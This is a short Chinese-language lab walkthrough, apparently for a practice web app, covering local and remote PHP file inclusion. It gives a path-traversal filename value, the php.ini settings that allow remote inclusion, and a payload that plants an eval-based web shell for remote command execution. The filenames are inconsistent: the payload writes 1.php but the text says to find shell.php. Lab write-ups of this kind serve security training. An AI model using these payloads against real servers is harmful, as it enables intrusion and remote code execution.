1.File inclusion(local)(本地文件包含)
提交一个球员信息
filename后面输入../../../../../1.php访问php文件
2.File Inclusion(remote)(远程文件包含)
修改配置
远程包含漏洞的前提:需要php.ini配置如下:
allow_url_fopen=on //默认打开
Allow_url_include=on //默认关闭
选择一个球员提交
创建一个2.php文件,里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>
fileinclude目录下找到shell.php文件
访问php文件,连接
